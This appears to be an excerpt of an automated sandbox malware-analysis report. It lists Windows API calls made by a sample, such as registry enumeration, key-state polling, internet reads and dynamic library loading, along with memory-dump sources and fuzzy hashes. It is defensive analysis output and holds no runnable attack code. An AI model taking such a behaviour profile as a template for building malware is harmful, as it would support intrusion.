                                                          • Part of subcall function 0070DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0070CF22,?), ref: 0070DE16
                                                          • Part of subcall function 0070E199: GetFileAttributesW.KERNEL32(?,0070CF95), ref: 0070E19A
                                                        • lstrcmpiW.KERNEL32(?,?), ref: 0070E473
                                                        • MoveFileW.KERNEL32(?,?), ref: 0070E4AC
                                                        • _wcslen.LIBCMT ref: 0070E5EB
                                                        • _wcslen.LIBCMT ref: 0070E603
                                                        • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 0070E650
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                        • String ID:
                                                        • API String ID: 3183298772-0
                                                        • Opcode ID: 57a586fd07c38986455bd23495c910b27ec26011e5154bb1731a776ed25daf7c
                                                        • Instruction ID: a02badc2cf8fd2c1a0c59073e09f059cedca489f95abe6c5498bbf2bd22d858d
                                                        • Opcode Fuzzy Hash: 57a586fd07c38986455bd23495c910b27ec26011e5154bb1731a776ed25daf7c
                                                        • Instruction Fuzzy Hash: 2B5185B24083849BC764EB90DC81DDB73DDAF85340F004D1EF585D3191EE79A688876A
                                                        APIs
                                                          • Part of subcall function 006A9CB3: _wcslen.LIBCMT ref: 006A9CBD
                                                          • Part of subcall function 0072C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0072B6AE,?,?), ref: 0072C9B5
                                                          • Part of subcall function 0072C998: _wcslen.LIBCMT ref: 0072C9F1
                                                          • Part of subcall function 0072C998: _wcslen.LIBCMT ref: 0072CA68
                                                          • Part of subcall function 0072C998: _wcslen.LIBCMT ref: 0072CA9E
                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0072BAA5
                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0072BB00
                                                        • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0072BB63
                                                        • RegCloseKey.ADVAPI32(?,?), ref: 0072BBA6
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 0072BBB3
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                        • String ID:
                                                        • API String ID: 826366716-0
                                                        • Opcode ID: 2d0b65ac68325488d8db8e5b9209b7237ff4a030eb1e999cafe2a6215cd00bae
                                                        • Instruction ID: a66ee4c84bbcfd65b4145fc5f23d9bcefbc37a8b972fa711fd8a289637f12273
                                                        • Opcode Fuzzy Hash: 2d0b65ac68325488d8db8e5b9209b7237ff4a030eb1e999cafe2a6215cd00bae
                                                        • Instruction Fuzzy Hash: 81619E71208241AFD714DF24D890E2ABBE5FF85308F14895CF49A8B2A2DB35ED45CB92
                                                        APIs
                                                        • VariantInit.OLEAUT32(?), ref: 00708BCD
                                                        • VariantClear.OLEAUT32 ref: 00708C3E
                                                        • VariantClear.OLEAUT32 ref: 00708C9D
                                                        • VariantClear.OLEAUT32(?), ref: 00708D10
                                                        • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00708D3B
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: Variant$Clear$ChangeInitType
                                                        • String ID:
                                                        • API String ID: 4136290138-0
                                                        • Opcode ID: 47a9677aa6cd7904e2148370d002bb540f25312e86c4c340310d7112019bb7de
                                                        • Instruction ID: caa3178869c16f97606955d8415d3f7f022497c49eb6073668c2631738f30cce
                                                        • Opcode Fuzzy Hash: 47a9677aa6cd7904e2148370d002bb540f25312e86c4c340310d7112019bb7de
                                                        • Instruction Fuzzy Hash: 91516CB5A00219EFDB10CF68C884AAAB7F4FF8D310B158659E955DB350E734E911CF90
                                                        APIs
                                                        • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00718BAE
                                                        • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00718BDA
                                                        • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00718C32
                                                        • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00718C57
                                                        • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00718C5F
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: PrivateProfile$SectionWrite$String
                                                        • String ID:
                                                        • API String ID: 2832842796-0
                                                        • Opcode ID: a92867ae02e4fba3e64d237cffe03563704db4fcf58c572278398707fef27779
                                                        • Instruction ID: 4abd7b07affbde788f5eba9970c2fd665fbc75d7bc9cd5158e9eec6b9643f4dc
                                                        • Opcode Fuzzy Hash: a92867ae02e4fba3e64d237cffe03563704db4fcf58c572278398707fef27779
                                                        • Instruction Fuzzy Hash: 36515135A002149FCB45EF54C8819ADBBF6FF49314F048498E8496B362CB35ED51CFA5
                                                        APIs
                                                        • LoadLibraryW.KERNEL32(?,00000000,?), ref: 00728F40
                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00728FD0
                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 00728FEC
                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00729032
                                                        • FreeLibrary.KERNEL32(00000000), ref: 00729052
                                                          • Part of subcall function 006BF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00711043,?,75C0E610), ref: 006BF6E6
                                                          • Part of subcall function 006BF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,006FFA64,00000000,00000000,?,?,00711043,?,75C0E610,?,006FFA64), ref: 006BF70D
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                        • String ID:
                                                        • API String ID: 666041331-0
                                                        • Opcode ID: 2346f86c10c3820cc2f03e87fc6ac498fd7acdd09cab3c5b80caa283de83a807
                                                        • Instruction ID: c9343f59b80668b93442212dfd5bd1dff79c1a99b543d0975e53b22046a69094
                                                        • Opcode Fuzzy Hash: 2346f86c10c3820cc2f03e87fc6ac498fd7acdd09cab3c5b80caa283de83a807
                                                        • Instruction Fuzzy Hash: AB514734A012159FCB51EF58C4948A9BBF2FF49314F088098E90AAB362DB35ED85CF91
                                                        APIs
                                                        • SetWindowLongW.USER32(00000002,000000F0,?), ref: 00736C33
                                                        • SetWindowLongW.USER32(?,000000EC,?), ref: 00736C4A
                                                        • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00736C73
                                                        • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,0071AB79,00000000,00000000), ref: 00736C98
                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00736CC7
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: Window$Long$MessageSendShow
                                                        • String ID:
                                                        • API String ID: 3688381893-0
                                                        • Opcode ID: 188b87462965ceefe9bd137a8c072ce2f7a8cfa584f1e601965b126b6759d74a
                                                        • Instruction ID: 34cc02223450b15d8e96ba58afe925e9c55271e4c6824c52ade64f9afdb6c19d
                                                        • Opcode Fuzzy Hash: 188b87462965ceefe9bd137a8c072ce2f7a8cfa584f1e601965b126b6759d74a
                                                        • Instruction Fuzzy Hash: 14411735600104BFFB24CF28CC58FA5BBA5EB09350F159268F899A72E2C379FD41CA60
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: _free
                                                        • String ID:
                                                        • API String ID: 269201875-0
                                                        • Opcode ID: bbf7dbc4252066e4352bdb06c5fb097d75aaf67452323d90e70bc21151d9fb0e
                                                        • Instruction ID: e30bd8d2d9a8791e6b541578e562d8e605dd4f360cdc1f57f8c2e881b592bc49
                                                        • Opcode Fuzzy Hash: bbf7dbc4252066e4352bdb06c5fb097d75aaf67452323d90e70bc21151d9fb0e
                                                        • Instruction Fuzzy Hash: 5B41D372E00201AFCB20DF78CC90AADB3A6EF98314B1585AAE615EB351D631AD01CB80
                                                        APIs
                                                        • GetCursorPos.USER32(?), ref: 006B9141
                                                        • ScreenToClient.USER32(00000000,?), ref: 006B915E
                                                        • GetAsyncKeyState.USER32(00000001), ref: 006B9183
                                                        • GetAsyncKeyState.USER32(00000002), ref: 006B919D
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: AsyncState$ClientCursorScreen
                                                        • String ID:
                                                        • API String ID: 4210589936-0
                                                        • Opcode ID: 2b62a5e5edd4c108a4d21ad1fa875db906c2cc9377143e6e41f04b3230596dbc
                                                        • Instruction ID: b37a1195e7d84454d3ee4bceadc74b538fe2e3f37035ce4173bc498ddc494d83
                                                        • Opcode Fuzzy Hash: 2b62a5e5edd4c108a4d21ad1fa875db906c2cc9377143e6e41f04b3230596dbc
                                                        • Instruction Fuzzy Hash: 6541707190850AFBDF05DF68C848BFEB776FF05320F248229E525A7290C7345995DB61
                                                        APIs
                                                        • GetInputState.USER32 ref: 007138CB
                                                        • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00713922
                                                        • TranslateMessage.USER32(?), ref: 0071394B
                                                        • DispatchMessageW.USER32(?), ref: 00713955
                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00713966
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                        • String ID:
                                                        • API String ID: 2256411358-0
                                                        • Opcode ID: d373a80a83920c3a0d01f0d71a5fe43b84db7de3e2ef9ebf28ca1f7acdc852c6
                                                        • Instruction ID: 3f0c63d8bdf46a541fe139efdb548559e1183dbeeb5ec88f21b4ae164416eacf
                                                        • Opcode Fuzzy Hash: d373a80a83920c3a0d01f0d71a5fe43b84db7de3e2ef9ebf28ca1f7acdc852c6
                                                        • Instruction Fuzzy Hash: 3331C6705043419EEB35CB3C9849FF63BA8AB05348F544569E46A920E0E3BCB6C5CB25
                                                        APIs
                                                        • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,0071C21E,00000000), ref: 0071CF38
                                                        • InternetReadFile.WININET(?,00000000,?,?), ref: 0071CF6F
                                                        • GetLastError.KERNEL32(?,00000000,?,?,?,0071C21E,00000000), ref: 0071CFB4
                                                        • SetEvent.KERNEL32(?,?,00000000,?,?,?,0071C21E,00000000), ref: 0071CFC8
                                                        • SetEvent.KERNEL32(?,?,00000000,?,?,?,0071C21E,00000000), ref: 0071CFF2
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                        • String ID:
                                                        • API String ID: 3191363074-0
                                                        • Opcode ID: 1dd7407f308a1b1bddf7ddbbd85bfad176248f1370edf59d63eaab90db812b82
                                                        • Instruction ID: e2a6ae22a1033bbaf3ac96322c0cb8abe4e407ca97c35a7e2f24e0acc46e39cb
                                                        • Opcode Fuzzy Hash: 1dd7407f308a1b1bddf7ddbbd85bfad176248f1370edf59d63eaab90db812b82
                                                        • Instruction Fuzzy Hash: E8314F72540205AFDB21DFE9C8849EBBBFDEB14351B10842EF516E2190D738EE829B64
                                                        APIs
                                                        • GetWindowRect.USER32(?,?), ref: 00701915
                                                        • PostMessageW.USER32(00000001,00000201,00000001), ref: 007019C1
                                                        • Sleep.KERNEL32(00000000,?,?,?), ref: 007019C9
                                                        • PostMessageW.USER32(00000001,00000202,00000000), ref: 007019DA
                                                        • Sleep.KERNEL32(00000000,?,?,?,?), ref: 007019E2
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: MessagePostSleep$RectWindow
                                                        • String ID:
                                                        • API String ID: 3382505437-0
                                                        • Opcode ID: 07dd149b171eab3e3dd14a7fe93011be3be12e3f1e505a52bf6d433887a1979e
                                                        • Instruction ID: 1dae97ac1a76f1816144f6cc83905d18d39eb55001df4f037ad1b871b861868d
                                                        • Opcode Fuzzy Hash: 07dd149b171eab3e3dd14a7fe93011be3be12e3f1e505a52bf6d433887a1979e
                                                        • Instruction Fuzzy Hash: 2F31D171A10259EFDB00CFA8CD99ADE3BB5EB05315F508329F921A72D1C774AD44DB90
                                                        APIs
                                                        • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00735745
                                                        • SendMessageW.USER32(?,00001074,?,00000001), ref: 0073579D
                                                        • _wcslen.LIBCMT ref: 007357AF
                                                        • _wcslen.LIBCMT ref: 007357BA
                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00735816
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$_wcslen
                                                        • String ID:
                                                        • API String ID: 763830540-0
                                                        • Opcode ID: 6b02974a2139a1f69b9a3f06057975b03bf83dfa57d8dd226698498037ca96d4
                                                        • Instruction ID: 2569d568b952c656dd8ea0e9876d3f60de138acd24f3418fa41da0762a08166d
                                                        • Opcode Fuzzy Hash: 6b02974a2139a1f69b9a3f06057975b03bf83dfa57d8dd226698498037ca96d4
                                                        • Instruction Fuzzy Hash: 45219671904618DAEB20DF64CC85EED77B8FF04724F108256F919EB181D7789985CF50
                                                        APIs
                                                        • IsWindow.USER32(00000000), ref: 00720951
                                                        • GetForegroundWindow.USER32 ref: 00720968
                                                        • GetDC.USER32(00000000), ref: 007209A4
                                                        • GetPixel.GDI32(00000000,?,00000003), ref: 007209B0
                                                        • ReleaseDC.USER32(00000000,00000003), ref: 007209E8
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: Window$ForegroundPixelRelease
                                                        • String ID:
                                                        • API String ID: 4156661090-0
                                                        • Opcode ID: 2f3acf62926c5dc75a484f25e2c268c6e775e616ca5db68dc9db2e2dcbe1595a
                                                        • Instruction ID: 1832741f6c6e4817c8238058e0b53ad19e6434e4a86a8d43056e9797b618d9c5
                                                        • Opcode Fuzzy Hash: 2f3acf62926c5dc75a484f25e2c268c6e775e616ca5db68dc9db2e2dcbe1595a
                                                        • Instruction Fuzzy Hash: 54216275600214EFD704EF69D849A9EB7E5EF45701F04806CE846A7762DB34AD44CB94
                                                        APIs
                                                        • GetEnvironmentStringsW.KERNEL32 ref: 006DCDC6
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 006DCDE9
                                                          • Part of subcall function 006D3820: RtlAllocateHeap.NTDLL(00000000,?,00771444,?,006BFDF5,?,?,006AA976,00000010,00771440,006A13FC,?,006A13C6,?,006A1129), ref: 006D3852
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 006DCE0F
                                                        • _free.LIBCMT ref: 006DCE22
                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 006DCE31
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                        • String ID:
                                                        • API String ID: 336800556-0
                                                        • Opcode ID: ce353acf0768861f0230db6d7a3c0665d1f846854fc223a6b223364437af78bb
                                                        • Instruction ID: 5a65930ac331323c202c53e62deb77828f8671dd5b592b31bb769b961bb21018
                                                        • Opcode Fuzzy Hash: ce353acf0768861f0230db6d7a3c0665d1f846854fc223a6b223364437af78bb
                                                        • Instruction Fuzzy Hash: D401B5B2E0121B7F772116BA6C58DBBBA6EDEC6BB1315412AF905D7300DA648D01D2B4
                                                        APIs
                                                        • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 006B9693
                                                        • SelectObject.GDI32(?,00000000), ref: 006B96A2
                                                        • BeginPath.GDI32(?), ref: 006B96B9
                                                        • SelectObject.GDI32(?,00000000), ref: 006B96E2
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: ObjectSelect$BeginCreatePath
                                                        • String ID:
                                                        • API String ID: 3225163088-0
                                                        • Opcode ID: 2de4d58a562d0284fb22415752fa900933b68e6ed0d7e38de1e3af426652b721
                                                        • Instruction ID: 4382bcf5fc9e39fd00f339c7a417fbcc0c3eb0be21e7b36761f2b7859ce9df13
                                                        • Opcode Fuzzy Hash: 2de4d58a562d0284fb22415752fa900933b68e6ed0d7e38de1e3af426652b721
                                                        • Instruction Fuzzy Hash: BF21C5B1801349EFEB118F28DC047E97BB6BB10395F508216F614A61B0E37868C2CFA8
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: _memcmp
                                                        • String ID:
                                                        • API String ID: 2931989736-0
                                                        • Opcode ID: d46096b21e72e0aa00e33ada5c53fcf3725ea46040bbe89096dd9e2bda915681
                                                        • Instruction ID: 44e7fc5ee0da425991544ec15317b7f9886ddad094edd1cb3fa21356033eacb1
                                                        • Opcode Fuzzy Hash: d46096b21e72e0aa00e33ada5c53fcf3725ea46040bbe89096dd9e2bda915681
                                                        • Instruction Fuzzy Hash: 1001B9E1681605FBE71855209E52FBB739DDF22398F005128FD089E2C2FB68ED1096B5
